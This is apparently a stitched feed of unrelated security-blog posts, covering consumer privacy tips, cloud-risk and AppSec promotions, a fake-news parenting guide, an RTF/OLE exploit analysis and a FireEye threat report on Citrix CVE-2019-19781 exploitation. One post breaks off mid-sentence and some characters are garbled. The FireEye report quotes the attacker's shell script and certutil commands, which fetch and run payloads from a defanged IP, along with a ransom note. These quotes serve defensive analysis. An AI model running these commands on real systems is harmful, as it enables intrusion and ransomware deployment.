Password reuse is a common problem, especially in consumer cloud services. If you reuse passwords, you only need one of your cloud services to be breached—once criminals have stolen your credentials through one service, they potentially have access to every account that shares those same credentials, including banking platforms, email and other services where sensitive data is stored. When using a cloud service for the first time, it’s easy to think that if the data you are using in that particular service isn’t confidential, then it doesn’t matter if you use your favorite password. But a good way to think of it is this:  Many passwords, one breach. One password…. (potentially) many breaches. If you’re concerned about being able to remember them, look into obtaining a password manager.

2. Don’t share folders, share files

Many cloud services allow collaboration or file sharing. If you only want to share a few files, share those and not a complete folder. It’s all too easy to over-share without realizing what else is in the folder—or to forget who you shared it with (or that you shared it at all!) and later add private files that were never meant to be disseminated.

3. Be careful with auto-sync (it could bring in malware)

If you share a folder with someone else, many cloud services provide auto-sync, so that when another user adds new files, they get synced to everyone in the share. The danger here is that if someone you are sharing with gets infected by malware, this malware could be uploaded to the cloud and downloaded to your devices automatically.

4. Be careful of services that ask for your data

When logging into a new service, you may be asked for some personal data; for example, your date of birth. Why should they ask, and what will they do with this information?  If they can tie that to your email address, and another service obtains your zip-code and a third service asks for your mobile number, you can see that anyone collating that information could have enough to try to steal your identity. If there’s no reason why a service should have that data, use a different service (or, at least, give them incorrect information).

5. Read EULA & privacy policies – who owns the data?

I know this sounds hard, but it is worth it: Does the cloud provider claim that they own the data you upload? This may give them the right, or at least enough rights in their own mind, to sell your data to data brokers. This is more common than you think—you should never use a service that claims it owns your data.

6. Think twice about mobile apps and their data collection

Many cloud services have a mobile app as a way to access their service. Before using a mobile app, look at the data it says it will collect. Often the app collects more data than would be collected if you were to access the service via browser.

7. If unsure, ask your IT department if they have reviewed the service.

Some organizations’ IT departments will have already reviewed a cloud service and decided if it is acceptable for corporate use. It’s in their interest to keep their users secure, especially as so many devices now contain both personal and business data. Ask them if they have reviewed a service before you access it.

8. Don’t use public Wi-Fi hotspots without using a VPN for encryption.

Public Wi-Fi can be a place for data interception. Always use a VPN or encryption technology to ensure data is encrypted between your device and cloud services when on a public Wi-Fi.

9. Enable multi-factor authentication.

Cloud services that are well designed will offer additional security services, such as multi-factor authentication. Use those, and any other security features that you can.

10. Don’t share accounts with friends and family.

It’s often second nature to share with our friends and family. But are they as concerned about privacy as you are? Don’t share accounts, otherwise if they let their guard drop, your data could be compromised.

Check out more ways to take action and protect your data. 

Take a look at our additional resource for safeguarding your personal data in the cloud . 

The post Top 10 Cloud Privacy Recommendations for Consumers appeared first on McAfee Blogs.

Take Action This Data Privacy Day

We all know that data breaches have been on the rise, and hackers are finding clever, new ways to access our devices and information. But sometimes it takes a little push to get us to take action when it comes to protecting our most sensitive information. That’s why this Data Privacy Day, on January 28th, we have the perfect opportunity to own our privacy by taking the time to safeguard data, and help others do the same.

After all, there are now roughly four billion consumers connected online, living various moments of truth that could potentially put them at risk. From sharing photos and socializing with friends, to completing bank transactions—people expect to do what they desire online whenever and wherever they want. But as the saying goes, “with great power comes great responsibility”, and it is imperative that consumers take accountability, not just by enjoying the advantages of connecting online, but by protecting their online identities, too.

Remember, your personal information and online presence are as valuable as money, and what you post online can last a lifetime. Data Privacy Day is a reminder for everybody to make sure that they are protecting what matters most to them: their personal data, as well as their families and friends.

So, let’s get started. Even if you have a large online footprint, protecting this information doesn’t have to be overwhelming.

Here are a few tips:

Update your privacy and security settings—Begin with the websites and applications that you use the most. Check to see if your accounts are marked as private, or if they are open to the public. Also, look to see if your data is being leaked to third parties. You want to select the most secure settings available, while still being able to use these tools correctly.  Here’s a guide from StaySafeOnline to help you get started.

Start the New Year with a new digital you— When opening new online accounts for sharing personal information such as your email address or date of birth, create a new digital persona that has alternative answers that only you would know. This will limit online tracking of your real personal information.

Lockdown your logins—At the same time, secure your logins by making sure that you are creating long and unique passphrases for all of your accounts. Use multi-factor identification, when available. This is a security protocol that takes more than just one step to validate your login, such as a password and a code sent to your mobile device, or a fingerprint. It is exponentially more secure than a simple password.

Spread the word and get involved— Once you have done your own privacy check, help others do the same. It’s important that we all feel empowered to protect our privacy, so share the safety tips in this article with your family, coworkers, and community. Here are some helpful resources to create privacy awareness where you live.

Protect your family and friends – If you are a parent, you can make a big difference by helping raise privacy-savvy kids. After all, today’s kids represent the future of online security. If they start building their digital footprints with solid safety habits, it makes all of us more secure.

Begin with this handy tip sheet.

Own your information—It’s time for everyone to feel empowered to own their information. While there will always be online threats, you can minimize any potential harm by committing yourself to the action steps we listed above. Once you have, spread the word by using the hashtag #privacyaware on Twitter, Instagram, or Facebook.

Let’s make this 12th annual international Data Privacy Day the most effective ever! Stay up to date with all the event happenings, here, and keep informed year-round on the latest threats and security tips.

The post Take Action This Data Privacy Day appeared first on McAfee Blogs.

NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones

Criminals sometimes damage their mobile phones in an attempt to destroy evidence. They might smash, shoot, submerge or cook their phones, but forensics experts can often retrieve the evidence anyway. Now, researchers at the National Institute of Standards and Technology (NIST) have tested how well these forensic methods work. A damaged phone might not power on, and the data port might not work, so experts use hardware and software tools to directly access the phone’s memory chips. These include hacking tools, albeit ones that may be lawfully used as part of a criminal investigation. Because

Cyber Threat Trends Dashboard

Introduction

Information sharing is one of the most important activity that cybersecurity researchers do on daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities involved in cybersecurity are mostly focused on Indicator of Compromise such as: URL, IPs, Domains and file hashes which are perfectly used to arm protection tools such as: proxies, ng-firewalls and Antivirus Engines.

Collecting and analyzing public available samples every single day I became more and more interested on the Cyber threats evolution (Cyber Threats Trend) rather than specific single analyses, which after hundreds of them, could get bored (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). Regarding APT well it’s another cup of tea (a lot of passion in understanding next steps in there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends that are observed over days. The dashboard is available HERE (on top menu TOOLS => Cyber Threat Trends). So far only few basic information are showed, if you would like to see more stats/graph/infos, please feel free to contact me (HERE).

Description

Aim of this dashboard is to monitor trends over thousands even millions of samples providing quantitative analyses on what has observed during the performed automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it as raw-data where you can start to elaborate your own research and eventually where you can apply your personal filters or considerations. If you do that, you should be aware that false positives could be behind the corner Let’s move on the current graphs and let’s try to explain what I’d like to show with them but before getting in you should be aware that all the digits on the graphs are expressing percentages and not absolute numbers. Now let’s dig a little bit on them.

  • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
  • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

Conclusion

The introduced dashboard is part of my cybersecurity community contribution as every free tool released on the “Tools” menu box. Cyber Threat Trends dynamically evolves over time and you might find it useful to ask questions about live statistics on cybersecurity threats. If you are a journalist or a cybsec passionate you might find some answers to trending questions to be elaborated over time.

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

Huawei is a Chinese telecoms company founded in 1987. US officials believe it poses a security risk because the Chinese government will make the firm engineer backdoors in its technology, through which information could be accessed by Beijing. Donald Trump has banned US companies from sharing technology with Huawei and has been putting pressure on other nations to follow suit.

Continue reading...

Data Goes Supernova: Exploring Security at the Cloud Edge

Modern enterprises are fueled by data. The force of the cloud has been like gravity in a supernova, causing data to explode outward and disperse forever. No longer constrained by the network, the free flow of data to cloud service providers and a wide range of devices fragments visibility and control for enterprise security.

In our latest study on cloud adoption and risk, we traverse the paths of enterprise data as it disperses beyond the network perimeter. Through this research, which combines survey results from 1,000 enterprises in 11 countries and anonymized event data from 30 million enterprise cloud users, we are able to uncover the new areas of risk every enterprise must address in our cloud-first world.

To jump in now, download the full report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

In the report we evaluate three areas of context that together address the dispersion of data to the cloud:

  1. Cloud context: Data protection must understand the creation and flow of data within the cloud, through collaboration and inter-cloud sharing.

Twelve percent of files shared in the cloud contain sensitive data, an increase of 57% year over year.

  1. Device context: IT needs the ability to understand whether it is a personal device or one which they control accessing sensitive data. Data loss to personal, unmanaged devices cannot be remediated.

Only 41% of companies can control personal device access to their data in the cloud.

  1. Web context: The continuous expanse of cloud services is impossible to predict, requiring rules that manage access through web before reaching an unknown cloud destination.

C-Level IT leaders see the risk of “Shadow IT,” while manager-level decision makers are less likely to report risk to their data from unsanctioned applications.

This is just a preview of the findings in this study. For the full story, download the entire report here: Enterprise Supernova: The Data Dispersion Cloud Adoption and Risk Report.

The post Data Goes Supernova: Exploring Security at the Cloud Edge appeared first on McAfee Blogs.

Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact??「 of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data presented four business benefits and average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours, annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to additional $888,000 in annual profit ツ?

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save ??? on average ??? almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact??「 of Veracode???s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Where’s the Truth Online? How to Build Your Family’s Digital Discernment

fake news

Note: This is Part I of a series on equipping your family fight back against fake news online. 

Fake news is chipping away at our trust in the government, the media, and in one another. And, because our kids spend much so much time in the online space, it’s more important than ever to help them understand how to separate truth from fiction.

How dangerous is the spread of misinformation? According to one study, 75% of people who see fake news believe it’s real. This inability to discern is at the core of how a false piece of information — be it a story, a photo, a social post, or an email — spreads like wildfire online.

Fake news erodes trust

A 2019 Pew Institute study reveled Americans rank fake news as a bigger problem in the U.S. over terrorism, illegal immigration, racism, and sexism and believe the spread of fake news is causing ‘significant harm’ to the nation and needs to be stopped.’

At the root of the issue is that too much news is coming at us from too many sources. True or not, millions of people are sharing that information, and they are often driven more by emotion and than fact.

According to Author and Digital Literacy Expert Diana Graber, one of a parent’s most important roles today is teaching kids to evaluate and be discerning with the content they encounter online.

“Make sure your kids know that they cannot believe everything they see or read online. Give them strategies to assess online information. Be sure your child’s school is teaching digital literacy,” says Graber.

Kids encounter and share fake news on social networks, chat apps, and videos. Says Graber, the role of video will rise as a fake news channel as AI technology advances.

“I think video manipulation, such as deepfake videos, is a very important area to keep an eye on for in the future. So much of the media that kids consume is visual, it will be important for them to learn visual literacy skills too,” says Graber.

The hidden costs of fake news

A December Facebook post warning people that men driving white vans were part of an organized human trafficking ring, quickly went viral on several social networks.

Eventually, law enforcement exposed the post as fake; people shrugged it off and moved on. But in its wake, much was lost that didn’t go viral. The fake post was shared countless times. With each share, someone compromised a small piece of trust.

The false post caused digital panic and cast uncertainty on our sense of security and community. The post cost us money. The false information took up the resources of several law enforcement agencies that chose to investigate. It cost us trust. Public warnings even made it to the evening news in some cities.

The spread of fake news impacts on our ability to make wise informed decisions. It chips away at our expectation of truth in the people and resources around us.

Fake news that goes viral is powerful. It can impact our opinions about important health issues. It can damage companies and the stock market, and destroy personal reputations.

In the same Pew study, we learned about another loss — connection. Nearly 54 percent of respondents said they avoid talking with another person because that person may bring made-up news into the conversation.

The biggest loss? When it’s hard to see the truth, we are all less well informed, which creates obstacles to personal and cultural progress.

Family talking points

Here are three digital literacy terms defined to help you launch the fake news discussion.

  1. Fake news: We like the definition offered by PolitiFact: “Fake news is made-up stuff, masterfully manipulated to look like credible journalistic reports that are easily spread online to large audiences willing to believe the fictions and spread the word.”Discuss: Sharing fake news can hurt the people in the story as well as the credibility of the person sharing it. No one wants to be known for sharing sketchy content, rumors, or half-truths.Do: Sit down with your kids. Scroll through their favorite social networks and read some posts or stories. Ask: What news stories spark your interest, and why? Who posted this information? Are the links in the article credible? Should I share this piece of content? Why or why not?
  2. Objectivity: Content or statements based on facts that are not influenced by personal beliefs or feelings.Discuss: News stories should be objective (opinion-free), while opinion pieces can be subjective. When information (or a person) is subjective, you can identify personal perspectives, feelings, and opinions. When information (or a person) is objective, it’s void of opinion and based on facts.Do: Teaching kids to recognize objective vs. subjective content can be fun. Pick up a local newspaper (or access online). Read the stories on the front page (they should contain only facts). Flip to the Op-Ed page and discuss the shift in tone and content.
  3. Discernment: A person’s ability to evaluate people, content, situations, and things well. The ability to discern is at the core of decision-making.Discuss: To separate truth from fiction online, we need to be critical thinkers who can discern truth. Critical thinking skills develop over time and differ depending on the age group.Do: Watch this video from Cyberwise on Fake News. Sit down together and Google a current news story. Compare how different news sites cover the same news story. Ask: How are the headlines different? Is there a tone or bias? Which story do you believe to be credible, and why? Which one would you feel confident sharing with others? 

The increase in fake news online has impacted us all. However, with the right tools, we can fight back and begin to restore trust. Next week, in Part II of this series, we’ll discuss our personal responsibility in the fake news cycle and specific ways to identify fake news.

The post Where’s the Truth Online? How to Build Your Family’s Digital Discernment appeared first on McAfee Blogs.

An Inside Look into Microsoft Rich Text Format and OLE Exploits

There has been a dramatic shift in the platforms targeted by attackers over the past few years. Up until 2016, browsers tended to be the most common attack vector to exploit and infect machines but now Microsoft Office applications are preferred, according to a report published here during March 2019. Increasing use of Microsoft Office as a popular exploitation target poses an interesting security challenge. Apparently, weaponized documents in email attachments are a top infection vector.

Object Linking and Embedding (OLE), a technology based on Component Object Model (COM), is one of the features in Microsoft Office documents which allows the objects created in other Windows applications to be linked or embedded into documents, thereby creating a compound document structure and providing a richer user experience. OLE has been massively abused by attackers over the past few years in a variety of ways. OLE exploits in the recent past have been observed either loading COM objects to orchestrate and control the process memory, take advantage of the parsing vulnerabilities of the COM objects, hide malicious code or connecting to external resources to download additional malware.

Microsoft Rich Text Format is heavily used in the email attachments in phishing attacks. It has been gaining massive popularity and its wide adoption in phishing attacks is primarily attributed to the fact that it has an ability to contain a wide variety of exploits and can be used efficiently as a delivery mechanism to target victims. Microsoft RTF files can embed various forms of object types either to exploit the parsing vulnerabilities or to aid further exploitation. The Object Linking and Embedding feature in Rich Text Format files is largely abused to either link the RTF document to external malicious code or to embed other file format exploits within itself and use it as the exploit container. Apparently, the RTF file format is very versatile.

In the below sections, we attempt to outline some of the exploitation and infection strategies used in Microsoft Rich Text format files over the recent past and then towards the end , we introspect on the key takeaways that can help automate the analysis of RTF exploits and set the direction for the generic analysis approach.

RTF Control Words

Rich Text Format files are heavily formatted using control words. Control words in the RTF files primarily define the way the document is presented to the user. Since these RTF control words have the associated parameters and data, parsing errors for them can become a target for exploitation. Exploits in the past have been found using control words to embed malicious resources as well. Consequently, it becomes significant to examine a destination control word that consumes data and extract the stream. RTF specifications describe several hundred control words consuming data.

RTF parsers must also be able to handle the control word obfuscation mechanisms commonly used by attackers, to further aid the analysis process. Below is one of the previous instances’ exploits using control word parameters to introduce executable payloads inside the datastore control word.

Overlay Data in RTF Files

Overlay data is the additional data which is appended to the end of RTF documents and is predominantly used by exploit authors to embed decoy files or additional resources, either in the clear, or encrypted form which is usually decrypted when the attacker-controlled code is executed. Overlay data of the volume beyond a certain size should be deemed suspicious and must be extracted and analysed further. However, Microsoft Word RTF parser will ignore the overlay data while processing RTF documents. Below are some instances of RTF exploits with a higher volume of overlay data appended at the end of the file, with CVE-2015-1641 embedding both the decoy document and multi-staged shellcodes with markers.

Object Linking and Embedding in RTF Files

Linked or embedded objects in RTF documents are represented as RTF objects, precisely to the RTF destination control word “object”. The data for the embedded or linked object is stored as the parameter to the RTF sub-destination control word “objdata” in the hex-encoded OLESaveToStream format. Modifier control word “objclass” determines the type of the object embedded in the RTF files and helps the client application to render the object. However, the hex encoded object data as the argument to the “objdata” control word can also be heavily obfuscated, either to make the reverse engineering and analysis effort more time consuming or to break the immature RTF parsers. Apparently, OLE has been one of the dominant attack vectors in the recent past, with many instances of OLE based exploits used in targeted attacks, essentially implying robust RTF document parsers for the extraction of objects, along with deeper inspection of object data is extremely critical.

Object Linking – Linking RTF to External Resource

Using object linking, it is possible to link the RTF files to the remote object which could be the link to the malicious resource hosted on the remote server. This leads the resulting RTF file to behave as a downloader and subsequently execute the downloaded resource by invoking the registered application-specific resource handlers. Inspecting the modifier RTF control words to “object”, linked objects are indicated by another nested control word “objautlink”, as represented below in the RTF document.

As indicated in the above representation, object data as the argument to the RTF control word “objdata” is OLE1.0NativeStream in the OLESaveToStream format which is followed by the NativeDataSize indicating the size of the OLE2.0 Compound document that is wrapped in the NativeStream. As per the Rich Text Format specifications, if the object is linked to the container application, which in this case is the RTF document, the Root Storage directory entry of the compound document will have the CLSID of the StdOleLink indicating the linked object. Also, when the object is in the OLE2.0 format, the linked source data is specified in the MonikerStream of the OLESteam structure. As highlighted below, while parsing the object data, the ole32.OleConvertOLESTREAMToIStorage function is responsible for converting the OLE1.0 NativeStream data to OLE2.0 structured storage format. Following the pointer to the OLE stream lpolestream will allow us to visualize the parsed extracted native data. Below is a memory snapshot from when an RTF document with a linked object was parsed by the winword.exe process.

Launching the RTF document with the link to external object will throw up a dialogue box asking to update the data from the linked object, as shown below.

However, this is not the ideal exploitation strategy to target victims. This error can be eliminated by inserting another modifier control word “objupdate”, which internally calls link object’s IOleObject::Update method to update the link’s source.

Subsequently the urlmon.dll, which is the registered server for the URL Moniker, is instantiated.

Once the COM object is instantiated, the connection is initiated to the external resource and, based on the content-type header returned by the server in the response, URL Moniker consults the Mime database in the registry and invokes registered application handlers.

Details on how URL Moniker is executed and an algorithm to determine which appropriate handlers to invoke is described by Microsoft here.  We have had multiple such RTF exploits in the past including CVE-2017-0199, CVE-2017-8756 and others using Monikers to download and execute remote code.

However, COM objects used in the mentioned exploits had been blacklisted by Microsoft in the newer versions, but similar techniques could be used in future which essentially necessitates the analysis of OLE structured storage streams.

Object Embedding – RTF Containing OLE Controls

As indicated earlier, embedded objects are represented in the container documents in the OLE2 format. When the object is stored in the OLE2 format, the container application (here Rich Text Format files) creates the OLE Compound File Storage for each of the objects embedded and the respective object data is stored in the OLE Compound File Stream Objects. Layout of the container documents storing embedded objects is as represented below and described in the Microsoft documentation here.

RTF exploits historically have been found embedding and loading multiple OLE controls in order to bypass exploit mitigations and to take advantage of memory corruption vulnerabilities by loading vulnerable OLE controls. Embedded OLE controls in the RTF document are usually indicated by nested control word “objocx” or “objemb” followed by the “objclass” with the argument as the name of the OLE control to render the object. Below is one of the examples of the previous exploit used in the targeted attacks, which exploited a vulnerability in the COM object and loaded another OLE control to aid the exploitation process which had the staged malicious code embedded. Apparently, it is critical to extract this object data, extract the OLE2 compound file storage and extract each of the stream objects for further inspection of hidden malicious shellcodes.

Object Embedding – RTF Containing Other Documents

Malicious RTF documents can use the OLE functionality to embed other file formats like Flash files and Word documents, either to exploit respective file format vulnerabilities or to further assist and set up the stage for the successful exploitation process. Multiple RTF exploits have been observed in the past embedding OOXML documents using OLE functionality to manipulate the process heap memory and bypass Windows exploit mitigations. In RTF files, embedded objects are usually indicated by nested control word “objemb” with a version-dependent “ProgID” string as the argument to the nested control word “objclass”. One such RTF exploit used in targeted attacks in the recent past, is as indicated below.

Below is another instance where the PDF file was physically embedded within the compound document. As mentioned, the embedded object is stored physically along with all the information required to render it.

In the embedded object, the creating application’s identifier is stored in the CLSID field of the compound file directory entry of the CFB storage object. If we take a look at the previous instance, when the object data is extracted and inspected manually, the following CLSID is observed in the CFB storage object, which corresponds to the CLSID_Microsoft_Word_Document.

When OLE2 stream objects are parsed and the embedded OOXML is extracted and analysed after deflating the contents, we see the suspicious ActiveX object loading activity and embedded malicious code in one of the binary files. Apparently, it is significant to extract the embedded files in RTF and perform further analysis.

OLE Packages in RTF Files

RTF documents can also embed other file types like scripts (VBSsript, JavaScript, etc.), XML files and executables via OLE packages. An OLE package in an RTF file is indicated by the ProgID string “package” as the argument to the nested control word “objclass”. Packager format is the legacy format that does not have an associated OLE server. Looking at the associated CLSID in the registry, there is no specific data format mapped with Packages.

This essentially implies that OLE packages can store multiple file types and, if a user clicks the object, it will lead to execution of it and, eventually, infection of the machine if they are malicious scripts. RTF documents have been known to deliver malware by embedding scripts via OLE packages and then using Monikers, as described in the previous sections, to drop files in the desired directory and then execute them. One such instance of a malicious RTF document exploiting CVE-2018-0802, embedding an executable file, is shown below.

Since many RTF documents have been found delivering malware via OLE packages, it is critical to look for these embedded objects and analyse them for such additional payloads. Embedded executables / scripts within RTF could be malicious. Looking for OLE packages and extracting embedded files should be a trivial task.

The above exploit delivery strategies can allow us to take a step towards building analysis frameworks for RTF documents. Primarily, inspecting the linked or embedded objects turns out to be the critical aspect of automated analysis tasks along with the RTF control words inspection. The following are the key takeaways:

  • Using the RTF file as the container, many other file format exploits can be embedded inside using the Object Linking and Embedding feature, essentially weaponizing the RTF documents.
  • Extract and analysing embedded or linked objects for malicious code, payload or resource handler invocations becomes very essential.
  • If RTF document has a higher volume of appended data, it must be further looked at.
  • Non-OLE control words and OLE packages must also be analysed for any malicious content.

McAfee Response

As Microsoft Office vulnerabilities continue to surface, generic inspection methods will have to be improved and enhanced, consequently leading to better detection results. As a reminder, the McAfee Anti-Malware engine used on all our endpoints and most of our appliances has the potential to unpack Office, RTF and OLE documents, expose the streams of content and unpack these streams if necessary.

The post An Inside Look into Microsoft Rich Text Format and OLE Exploits appeared first on McAfee Blogs.

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, searches for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and downloads two additional files to the system: piz.Lan, a XOR-encoded data blob, and de.py, a Python script, to a temporary directory. This script then changes permissions and executes de.py, which subsequently decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .net.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.net.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, represented in Table 1:

Filename

Functionality

MD5

x86.dll

32-bit Downloader

9aa67d856e584b4eefc4791d2634476a

x64.dll

64-bit Downloader

55b40e0068429fbbb16f2113d6842ed2

scan.py

Python socket scanner

b0acb27273563a5a2a5f71165606808c

xp_eternalblue.replay

Exploit replay file

6cf1857e569432fcfc8e506c8b0db635

eternalblue.replay

Exploit replay file

9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The contents of the ZIP were explained via analysis of the file scan.py, a Python scanning script that would also automate exploitation of identified vulnerable system(s). Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were present in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (respective to operating system bit-ness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique 11005 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.
certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 8). This file is an instance of the publicly available Meterpreter backdoor that was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated to 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified ragnarok-related about artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 11, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if suspect your Citrix appliances may have been compromised, we recommend utilizing the tool FireEye released in partnership with Citrix.

Detect the Technique

